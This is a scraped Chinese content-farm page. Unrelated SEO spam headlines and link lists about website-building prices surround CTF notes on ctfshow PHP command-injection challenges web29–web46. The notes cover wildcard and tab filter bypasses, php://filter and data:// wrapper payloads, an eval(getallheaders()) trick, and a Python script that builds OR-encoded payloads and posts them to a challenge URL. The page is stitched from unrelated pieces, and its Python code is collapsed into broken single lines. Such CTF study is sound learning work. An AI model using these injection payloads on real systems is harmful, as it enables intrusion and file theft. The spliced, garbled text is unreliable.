当前位置: 首页 > news >正文

东莞网站优化一般多少钱深圳罗湖网站制作公司哪家好

东莞网站优化一般多少钱,深圳罗湖网站制作公司哪家好,群晖做网站域名,可以做热图的在线网站大佬文章 L i n u x \rm Linux Linux 下空格绕过 无参数 r c e \rm rce rce 无字符 r c e \rm rce rce web29 通配符: *:匹配任意多个字符 ?:匹配任意一个字符 []:匹配某个范围的字符( [ a d ] [ad] [ad] 表示 …

大佬文章

L i n u x \rm Linux Linux 下空格绕过

无参数 r c e \rm rce rce

无字符 r c e \rm rce rce

web29

  • 通配符:

    *:匹配任意多个字符

    ?:匹配任意一个字符

    []:匹配某个范围的字符( [ a d ] [ad] [ad] 表示 a − d a-d ad 的字符)

    {a,b}:匹配 a a a 或者 b b b

web30

  • echo `cat flag`:表示先运行 cat flag,然后再把结果输出

web31

  1. %09(tab) 绕过空格

  2. 命令拼接:c=eval($_POST[a]);,然后 POST 传入一个变量 a 即可

  3. 无参数 r c e \rm rce rce

web32

  • 过滤分号,用 ?> 代替

  • 过滤括号,使用 include 函数,其不需要括号传参(例如 include a.php)

因此 ?c=include%09$_POST[a]?> ,之后 post 传入一个文件即可

文件会被注释掉(显示不出来),所以考虑伪协议读文件

a=php://filter/read=convert.base64-encode/resource=flag.php

web37

  • 使用 php://input 协议,之后 post 传入需要的 php 代码即可

web38

  • data 伪协议读文件

    c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg== ( b a s e 64 \rm base64 base64system("cat flag");)

web39

  • 同web38

web40

  • 无参数命令执行

    getallheaders()http 头中的信息放到一个数组里面

    修改http 头中的某些不重要的内容为 system("cat flag"),使用语句 eval(array_rand(array_flip(getallheaders())));,多刷新几次即可做到无参数命令执行

web41

  • 无数字字母 r c e \rm rce rce

    一般实现方法是自增,取反,异或,或

    这题用的是或运算

    # coding=gbk
    import re
    import requests
    use = []
    def get_and(aim, use):ans1 = ""ans2 = ""for i in range(len(aim)):ok = Falsefor j in range(len(use)):for k in range(j,len(use)):if (ord(use[j]) | ord(use[k])) == ord(aim[i]):ans1 = ans1 + use[j]ans2 = ans2 + use[k]ok = Trueif ok: breakif ok: break            ans = ""for i in range(len(ans1)): ans += chr(ord(ans1[i]) | ord(ans2[i]))    print(ans)return "(\""+ans1+"\"|\""+ans2+"\")"if __name__ == '__main__':match_str = "/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-"url = "http://e5280b73-c2cb-4f3f-9309-68319256efdf.challenge.ctf.show/"for i in range(256):c = chr(i)tmp = re.match(match_str, c, re.I)if tmp == None:use.append(c)func = "system"argu = "cat flag.php"data = {"c":get_and(func,use)+get_and(argu,use)}print(data)r = requests.post(url = url, data = data)print(r.text)
    

web42

system($c." >/dev/null 2>&1"); 黑洞代码

  1. cat flag && ls:只会让后面的查询没有

  2. ls ##shell 脚本的注释

web46

  • flag 被过滤,可以换成 f''lag

未完待续

http://www.yayakq.cn/news/528731/

相关文章:

  • 西安网站建设公司网站设计规划建设的目的
  • 网站推广营销效果让顾客心动的句子
  • 为加强政协网站建设有限公司 wordpress
  • 织梦 旅游网站模板科技建站网站源码
  • 深圳专业网站建设公司好吗百度服务平台
  • 深圳苍松大厦 网站建设asp网站做搜索
  • 做搜狗网站优化首页软阿里云买完域名空间如何做网站
  • 无忧网站模板wordpress怎么自己写代码
  • 网站搭建吧住房城乡建设部服务平台
  • 企业网站的网络营销百度官网推广平台
  • 北京网站备案小程序源码安装
  • 做旅游计划的网站免费建网站 高校社团官方网站
  • 网站建设一般多少钱要如何选择wordpress+播放列表
  • 九龙坡做网站画logo的手机软件
  • 自己建一个网站需要多少钱淄博网络推广公司
  • 网站设计轮播图需要吗惠州网站制作公司
  • 做网站设计需要哪些软件爱做网站视频
  • 那些网站做的非常好看单页网站域名
  • 建站宝盒建站系统织梦网站后台密码忘记
  • 深圳网站建设公司设计公司怎么做网站赚流量
  • 手机网站设计只找亿企邦游戏编辑器
  • 常德网站建设案例教程同程网 网站模板
  • 电子商务系统建设网站策划书asp网上书店网站开发
  • 网站语言建设银行官方网站下载安装
  • 网站开发公司谁家好有什么软件可以制作抽奖页面
  • 长沙网站推广排名优化wordpress广告插件下载
  • 做一个网站放网上要多少钱wordpress链接排序
  • 网站开发基础房地产新闻最近
  • 免费游戏网站建设游戏后台新闻稿代写平台
  • 怎么知道网站被kps怎么做网站导航